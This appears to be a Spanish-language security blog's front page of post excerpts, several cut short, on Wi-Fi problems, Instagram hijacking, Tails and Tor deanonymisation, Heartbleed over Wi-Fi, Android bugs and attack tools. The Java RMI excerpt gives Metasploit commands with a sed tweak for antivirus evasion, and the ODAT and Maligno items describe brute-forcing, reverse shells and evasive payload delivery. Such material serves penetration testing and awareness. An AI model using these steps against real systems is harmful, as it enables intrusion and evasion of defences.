Interferencias Wifi y No-Wifi

Muchos creen que para montar una red Wifi, basta con comprar un router wifi (al cual se le conecta el internet) y para administrar la red le colocamos el SSID, (ojo no confundir SSID con BSSID) un cifrado WPA o superior, le activamos el DHCP (para la asignación de IPs de la LAN) y finalmente una clave de administración al router lo suficientemente robusta (y nunca cambian el usuario, que por lo general siempre es admin)... Y listo... Espere un momento. ¿No falta algo?... Déjelo así, que ya funciona de maravilla. Todos conectados y felices...

De la vida real…
Y a los pocos días... Grave la situación -dice el "admin"- Muy lenta la red, la gente se desconecta. Llamemos a “Fulano”, que es el duro en eso.
Una hora después…
- Tenías a mucha gente de afuera conectada ilegalmente a tu WiFi –dijo Fulano- Le metí todas las direcciones MAC de tu LAN en el router y quedó vacano... son 100 palos"
Y al día siguiente...
- Hijuep@&%#... Fulano me robó -dice el admin- La red sigue lenta. Llamemos a Mengano...
Llega Mengano y luego de una revisión "exhaustiva", dijo:
- Patrón; la solución es comprar un router de más calidad. Ese Cisco que tienes es a 54 y solo es compatible con B y G; necesitas uno a 300 y que maneje B/G/N… Tócalo para que veas... Si ves lo caliente que se pone… Eso es porque no soporta todo ese tráfico… Yo lo soluciono. Con “250 palos” verás cómo esa red vuela. Porque el ancho de banda de internet está bien; 10 megas es suficiente-
Y al día siguientes (y la cuenta ir por 350 dólares)...
- Malparid@&%#... -dice el admin- Sigue igual... Llamemos a "Zutano". Ese sí soluciona el asunto
Y al llegar "Zutano", revisó los equipos y como un disco rayado (ya que casi todos los técnicos en mantenimiento de PC dicen lo mismo), explicó:
- Virus... por toneladas. Tienes un zoológico en tu red local... Tienes dos opciones. Le metemos un antivirus a cada equipo, lo cual no es una garantía, o formateamos todos los equipos y los congelamos (freezer) para evitar que se metan más virus. Y tus usuarios que guarden los archivos en una usb o en una carpeta compartida...
- Mmm... Formatearlos y meterles un freezer me parece más razonable
Al final del día...
- Ya está listo... 400 dolores
24 horas después....
- Puta@&%#... Me engañaron de nuevo. Esa mier%$& de red se puso peor... ¿Qué hago? – le preguntó a su asistente, que encogía los hombros al no tener la respuesta.

Instasheep: secuestrar cuentas de Instagram en una red Wi-Fi

Stevie Graham, un programador de Londres, presentó recientemente un informe a Facebook describiendo lo que él veía como una vulnerabilidad en Instagram que podía permitir a alguien secuestrar la sesión de un usuario en base a los datos capturados a través de una red Wi-Fi pública.

Cuando Facebook le dijo que no iba a obtener una recompensa por el bug, Stevie se dedicó a preparar una herramienta de prueba de concepto para explotarla. "Denegado el programa de recompensas. El siguiente paso es escribir una herramienta automatizada que permite el secuestro masivo de cuentas", escribió. "Vuln bastante grave, FB. por favor arreglarla".

Instagram utiliza HTTP para gran parte de sus comunicaciones, transmitiendo en claro el nombre de cuenta del usuario y el id. Y como Graham demostró, hay otros datos que se envían entre el cliente iOS de Instagram y el servicio que se pasan en claro.

"Hackean" un cajero automático para jugar al Doom

Aussie50, un popular usuario de Youtube, ha publicado un vídeo en el que destripa un cajeto automático y lo adapta para jugar al famoso videojuego Doom.
El modelo del cajero es NCR Personas que combina con un PC y pantalla OEM, con un controlador i-Pac para el mapeo y configuración de botones, además del típico PIN pad. ¡Curioso cuanto menos!

¡Borré mis chats de WhatsApp sin querer! ¿Los puedo recuperar?

Suele ser bastante común que nos pidan recuperar algunos chats de WhatsApp que han sido borrados anteriormente de forma no intencionada. Veamos primero algunas consideraciones iniciales:

- Por defecto WhatsApp realiza una copia diaria en la tarjeta SD a las 04:00 am y almacena los últimos 7 días en  /sdcard/WhatsApp/Databases/msgstore.db.crypt7. 

 
- Es posible forzar la copia del historial actual (los mensajes más recientes) de forma manual:
 WhatsApp > Botón de menú > Ajustes > Ajustes de chat > Guardar conversaciones


El fichero será guardado en /sdcard/WhatsApp/Databases/msgstore-AAAA-MM-DD.1.db.crypt7.

Es decir, no podremos recuperar los mensajes con más de 7 días de antigüedad y aquellos posteriores a las 4:00 al menos que hayamos hecho previamente una copia de seguridad manual.

Confirman un 0-day en el componente I2P de Tails OS

Si anteriormente hablábamos de que la privacidad de Tor estaba en entredicho, ahora le toca el turno al sistema operativo favorito de Snowden: Tails.
Exodus Intelligence anunció hace unos días las existencia de varios 0-days que afectan hasta las versiones más recientes (1.1 del 22 de julio de 2014).

Concretamente la vulnerabildad se encuentra en la configuración por defecto de I2P. Para quien no la conozca, I2P (Proyecto de Internet Invisible) es una red similar a Tor pero conmutada por paquetes en lugar de por circuitos. En ella la comunicación es cifrada punto a punto con cuatro niveles de cifrado de forma totalmente distribuida y actualmente la forman unos 30.000 peers.

La vulnerabilidad que encontró Exodus permite la ejecución remota de código con una payload especialmente diseñado. Este payload se puede personalizar para desenmascarar a un usuario y mostrar su dirección IP pública en "un par de segundos", en una alusión clara a la técnica de Volynkin-McCor que por contrapartida parece que necesita más tiempo para desenmascarar usuarios de Tor.

En la primera parte del post de Exodus (Silver Bullets and Fairy Tails) muestran un vídeo con el exploit en funcionamiento, si bien prometen una siguiente entrada en la que mostrarán el detalle técnico una vez que las vulnerabilidades de i2P hayan sido parcheadas e incorporadas a Tails.

Sea como fuere, lo que comentábamos antes: cuando utilizamos soluciones estándar para mantener nuestro anonimato estamos más expuestos. 


No obstante recordar que siempre es mejor usarlas que nada. Es como si instalamos una alarma en casa, no nos asegurará al 100% nuestra seguridad pero al menos pondrá las cosas difíciles a los "ladrones".

Fuentes:
- Silver Bullets and Fairy Tails
- Exodus Intelligence Details Zero-Day Vulnerabilities In Tails OS
- Firm says vulnerability in Tails contained in I2P component
- Tails-hacking Exodus: Here's video proof of our code-injection attack 

Cancelan una charla de Black Hat sobre cómo identificar usuarios en Tor

En los últimos meses y después de las revelaciones de Snowden se empezó a investigar la posibilidad de que la NSA, y no sólo la NSA, hayan encontrado la forma de comprometer la popular red Tor. De hecho ya se ha confirmado que se usó la herramienta XKeyscore para comprometer dos servidores de Autoridad de Directorio alemanes y la posibilidad de ubicar usuarios específicos mediante una técnica de ataque de correlación de tráfico.

Además, siguiendo el hilo de estas investigaciones había previsto una presentación muy interesante para la próxima Black Hat 2014 llamada “YOU DON’T HAVE TO BE THE NSA TO BREAK TOR: DEANONYMIZING USERS ON A BUDGET“ (traducido “TU NO TIENES QUE SER DE LA NSA PARA ROMPER TOR: DESANONIMIZANDO USUARIOS SIN SALIRSE DEL PRESUPUESTO“) en la que Alexander Volynkin y Michael McCord, dos investigadores de la Universidad Carnegie Mellon, iban a demostrar cómo identificar usuarios de Tor con un presupuesto de unos 3.000 dólares.



Los lenguajes de programación más populares del 2014

CodeEval es una exclusiva comunidad de más de 24.000 desarrolladores. Sus miembros pueden competir entre sí, retar a sus amigos y mostrar sus habilidades de programación en su perfil.

Cada año CodeEval publica la lista de los "lenguajes de programación más populares", basándose en miles de datos recogidos al procesar más de 100.000 pruebas de programación y distintos retos realizados a más de 2.000 empleados.

Esto nos da una idea bastante clara de cuáles son las tendencias para el próximo año en términos de lo que las empresas están buscando: 


Como véis, por tercer año consecutivo, Python conserva el primer puesto seguido de Java, C++ y Ruby.

Los cambios más notables de este año fueron un incremento del 300% en la popularidad de Objective-C, un aumento del 100% en C#, así como un aumento del 33% de Javascript; mientras PHP perdió un 55%, Perl cayó un 16% y Java se redujo un 14%.

Fuente: http://blog.codeeval.com/2014

En marcha el IV Congreso de Seguridad Navaja Negra

Un año más se celebran en Albacete las jornadas de seguridad Navaja Negra, en esta edición, la organización ha apostado por un modelo más participativo y complementará las charlas con una serie de talleres que serán elegidos, al igual que las primeras, por los propios participantes de las jornadas en un sistema de votaciones al que se tiene acceso una vez realizado y verificado el pago de la inscripción. Un aspecto interesante de este método de selección es que al realizar la elección, sólo se conoce el contenido de la charla o taller y no su autor, fomentando así la participación de nuevos ponentes.
 
El congreso tendrá lugar durante los días 2, 3 y 4 de octubre y se trata de una gran oportunidad académica y profesional puesto que se habilitará un área de reclutamiento en la que las empresas colaboradoras aceptarán currículums de los participantes.
 
Gracias a patrocinadores y colaboradores, el precio de las jornadas sigue siendo más que asequible, 30€ (20 si acreditas que eres estudiante y/o estás desempleado) los 3 días incluyendo charlas, catering, la participación de hasta en 4 talleres, y ese trato familiar y ambiente distendido que caracteriza a las Navaja Negra.
 
Para ampliar información, consultar las propuestas presentadas al CFP y adquirir tu acreditación, no dudes en acceder a http://navajanegra.com ¡Te esperamos!

Explotar Heartbleed en redes WiFi con Cupido (2ª parte)

Como ya vimos en entradas anteriores, Cupido es el nombre del nuevo método de ataque recientemente propuesto por el investigador de seguridad portugués Luis Grangeia, que puede afectar a Android, redes inalámbricas 
empresariales y algun que otro dispositivo ;D.
 

 A diferencia de la versión original del ataque Heartbleed, que tiene lugar en las conexiones TLS a través de TCP, el ataque de Cupido sucede en las conexiones TLS a través del protocolo de autenticación extensible (EAP), popular marco de autenticación que se utiliza normalmente en las redes inalámbricas y conexiones peer-to-peer.

Vulnerabilidades en Android que pueden arruinarte (CVE-2013-6272 & com.android.phone)

Se han anunciado dos nuevas vulnerabilidades en sistemas Android (anteriores a la versión 4.4.4) que podrían permitir a una aplicación maliciosa realizar llamadas a números de tarificación especial sin que
el usuario se percate de ello y aún sin permisos para ello.
Las dos vulnerabilidades, muy similares entre sí, han sido anunciadas por Curesec.  El primero de los problemas, con CVE-2013-6272, aparece en Android 4.1.1 Jelly Bean y se presenta en todas las versiones hasta Android 4.4.2 KitKat.

Reside en com.android.phone y todo parece indicar que se ha corregido en la última versión 4.4.4.
  
Por otra parte, una segunda vulnerabilidad (sin CVE asignado todavía) en com.android.contacts solo está presente en las versiones Android 2.3.3 y 2.3.6. Ambas vulnerabilidades son explotables de la misma forma con idénticos resultados.

Versiones afectadas







Explotar Heartbleed en redes WiFi con Cupido (1ª parte)

Buenas de nuevo, ante todo pediros un perdón muy grande por este tiempo AFK (sobre todo a Vicente) pero me ha sido totalmente imposible mantener relación con el mundillo.

Para ir poniéndome al día y engrasando máquinas vamos a dar un repasillo práctico a uno de los fallos más escandalosos que ha habido en mi ausencia: Heartbleed.

Como ya mencionamos en el blog es posible dirigir un ataque hacia redes wifi (EAP TLS)...utilizando CUPIDO.

¿Qué es cupido?

Cupido es el nombre que Luis Grangeia, de SysValue, le dio a sus dos parches que se pueden aplicar a los programas "hostapd" y "wpa_supplicant" en Linux. Estos parches modifican el comportamiento de los programas para explotar el fallo de heartbleed en conexiones TLS que suceden en ciertos tipos de contraseñas protegidas en redes inalámbricas.

Como ya mencionamos, el ataque puede utilizarse de dos formas: atacar directamente a un Punto de Acceso (wpa_supplicant-cupid) o crear una red inalámbrica falsa a la espera de que se conecte un terminal vulnerable (hostapd-cupid).

En esta entrada veremos como aprovechar cupido sumado a nuestro cliente hostapd (attack vector 2).


Las mejores fotos aéreas de drones del 2014

Dronestagram es una comunidad que nació en Francia y en cuyo portal se publican y comparten miles de fotos de drones. Si no la conocíais os recomiendo que echéis un vistazo a su web porque allí podréis encontrar un montón de fotos espectaculares (si no la mayoría)

Del 15 de marzo al 30 de junio llevaron a cabo junto con National Geographic el primer consurso internacional de fotografías aéreas de drones.
Las reglas eran bastante simples: básicamente los participantes tenían que enviar las fotos aéreas tomadas por una cámara instalada en un drone; y ellos tenían que ser los titulares de derechos de autor para las fotos.

Los premios incluían drones, cámaras y dinero para impresiones en lienzo, aluminio o plexiglás. La foto ganadora además se publicará en el sitio web de National Geographic y en la edición francesa de la revista. Estos son los ganadores:

Premios de Dronestagram y National Geographic:


Primer premio: Capungaero


Recuperan miles de fotos y datos personales de smartphones de segunda mano que habían sido reseteados de fábrica

La firma de seguridad Avast compró 20 smatphones Android diferentes en eBay, todos ellos de segunda mano. Antes de venderlos, los anteriores propietarios realizaron una restauración de fábrica (WIPE DATA/FACTORY RESET), "borrando" todo el contenido de los teléfonos.

Sin embargo, mediante software de recuperación disponible en el mercado, pudieron recuperar unas 40.000 fotos (casi 1.000 de desnudos), 1.000 búsquedas de Google, 750 emails y mensajes de texto y 250 contactos y direcciones.

"La cantidad de datos personales que recuperamos de los teléfonos fue asombrosa. Encontramos de todo, desde un formulario de préstamo cumplimentado hasta selfies de lo que parecen ser los propietario anteriores", comenta Jude McColgan de Avast.

McColgan señala también que no hay que olvidarse de la privacidad a la hora de vender un teléfono: "Junto con sus teléfonos, los consumidores no se dan cuenta de que están vendiendo sus recuerdos y sus identidades. Las imágenes, correos electrónicos y otros documentos borrados de los teléfonos pueden ser explotados para el robo de identidad, el chantaje, o incluso con fines de acoso".

La motivación de Avast para realizar este estudio fue fundamentalmente promocionar el uso de su aplicación anti-robo (avast! Anti-Theft) que permite la limpieza y borrado permanente de los datos, pero también es un claro ejemplo de la gran cantidad de información personal expuesta que podemos encontrar en el mercado de segunda mano de smartphones y, en definitiva, de cualquier dispositivo que albergue información y cuyos datos no hayan sido adecuadamente sobrescritos...


Fuentes:
- Software vendor purchased used phones on eBay, recovering 750 female nude photos and 250 male nude selfies
- AVAST Demonstrates Risk of Selling Used Smartphones – Recovers 40,000 Personal Photos and Emails from Phones Bought Online
- Android Data Wipe Leaves Personal Data
- Avast Report Claims Wiping Your Android Phone Doesn’t Completely Erase Personal Data
- Avast: Android Phone Wiping Leaves Personal Data
- Hard Proof That Wiping Your Phone Doesn't Actually Delete Everything

ODAT (Oracle Database Attacking Tool): comprueba la seguridad de tu base de datos Oracle

ODAT (Oracle Database Attacking Tool) es una herramienta de código abierto para comprobar la seguridad de una base de datos Oracle de forma remota.

Ejemplos de uso de ODAT:


- tienes una base de datos Oracle escuchando remotamente y quieres encontrar SIDs válidos y credenciales para conectarte.
- tienes una cuenta válida en una base de datos Oracle y quieres escalar privilegios (por ejemplo SYSDBA)
- tienes una cuenta válida en una base de datos Oracle y quieres ejecutar comandos en el sistema operativo que la hospeda (por ej. para un shell inverso)



Características:

- buscar un SID válido en un listener remoto a través de: un ataque de diccionario / un ataque de fuerza bruta / ALIAS del listener
- buscar cuentas de Oracle usando: un ataque de diccionario / cada usuario de Oracle como la contraseña
- ejecutar comandos de sistema en el servidor de base de datos mediante: DBMS_SCHEDULER / JAVA / tablas externas / oradbg
- descargar los archivos almacenados en el servidor de base de datos mediante: UTL_FILE / tablas externas / CTXSYS
- subir archivos en el servidor de base de datos mediante: UTL_FILE / DBMS_XSLPROCESSOR / DBMS_ADVISOR
- borrar archivos usando: UTL_FILE
- enviar/recibir peticiones HTTP desde el servidor de base de datos usando: UTL_HTTP / HttpUriType
- escanear puertos del servidor local o un servidor remoto usando: UTL_HTTP / HttpUriType / UTL_TCP
- explotar el CVE-2012-313 (http://cvedetails.com/cve/2012-3137)

Cómo usar Whatsapp desde tu PC con el simulador Firefox OS

Si hace unos meses veíamos cómo usar Whatsapp desde el PC con Pidgin y el plugin 'whatsapp-purple', hoy veremos otra manera también muy fácil: con el emulador de Firefox OS.

Empezaremos abriendo el Administrador de aplicaciones de Firefox escribiendo en la barra de direcciones: 

about:app-manager

En la parte inferior del administrador pulsaremos el botón 'Iniciar simulador':


Como la primera vez no tendremos instalado el simulador procederemos a instalarlo:

Exploit publico para desactivar EMET

Los investigadores de Offensive Security utilizaron un viejo exploit que se aprovecha de una debilidad en la forma en la que IE 8 maneja los objetos en memoria con el fin de eludir ASLR y DEP y lo alteraron para desactivar la protección ofrecida por EMET.

Dado que no conseguían eludir individualmente las técnicas de Heap Spray y Stack Pivot, empezaron a pensar en una manera de desactivar todos ellos a la vez, mediante el desarme de EMET. Y encontraron una variable global en la sección “.data” en EMET.dll que puede activar o desactivar todas las protecciones ROP implementadas por EMET.

"Esto requiere que el atacante construya una cadena de ROP que va a recuperar de forma dinámica la dirección base de EMET.dll y sobrescribir la variable global con un cero".

El código completo está públicamente disponible:
Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass
http://www.exploit-db.com/exploits/33944/

Y en el siguiente vídeo podéis ver el exploit en acción:
http://vimeo.com/99658866


Explotación de carga de clases de Java RMI con evasión de antivirus

Los servicios Java Remote Method Invocation (RMI) se utilizan en las aplicaciones para permitir que los objetos Java se puedan utilizar desde una ubicación remota sin necesidad de utilizar ningún tipo de autenticación.

Si un cliente invoca la llamada a un método remoto, se pasa al servicio RMI toda la información del objeto Java para que luego sea ejecutado. Al pasar el objeto, el cliente también puede utilizar un cargador de clases que especifica dónde se puede encontrar el código de Java para manipular el objeto, que suele ser una URL apuntando a un archivo Jar. Sin autenticación o verificación, el servidor descarga el objeto Java y lo ejecuta con los mismos permisos que el servicio Java RMI (generalmente SYSTEM).

Cualquiera puede tomar ventaja de este servicio RMI para cargar y ejecutar código Java en el sistema. Además se puede hacer usando Metasploit (busca java_rmi) y para la evasión del antivirus es posible hacer algunos pequeños cambios:

cd /usr/share/metasploit-framework/data/java/metasploit/
cp Payload.class Payload-backup.class
jad Payload.class
sed -i ‘s/spawn/runme/’ Payload.jad
mv Payload.jad to Payload.java
javac Payload.java

msf > use exploit/multi/misc/java_rmi_server
msf exploit(java_rmi_server) > show targets
...objetivos...
msf exploit(java_rmi_server) > set TARGET
msf exploit(java_rmi_server) > show options
...muestra y configura opciones...
msf exploit(java_rmi_server) > exploit


Fuente: JavaRMI Remote Class Loading Exploitation with AV Bypass

Maligno: un servidor de payloads de Metasploit

En esta ocasión Maligno no tiene que ver con Chema Alonso ;) Se trata de una herramienta de código abierto de la firma Encripto AS para servir payloads de Metasploit en un test de intrusión. Es decir, genera shellcodes con msfvenom y los transmite por HTTP o HTTPS. Eso sí, el shellcode es cifrado con AES y codificado con Base64 antes de enviarse.

Maligno tiene también una parte cliente para descargar el payload de Metasploit cifrado. Una vez que se recibe el shellcode, el cliente lo descodifica, lo descifra y lo inyecta en la máquina objetivo.

Como resultado, obtendremos una sesión de Metasploit evadiendo detecciones...

Para instalarlo echa un vistazo a este vídeo: http://www.youtube.com/watch?v=97A0pXWbz6c o sigue los pasos siguientes:

1.- Instala python-ipcalc (dependencia):

sudo apt-get update && sudo apt-get install python-ipcalc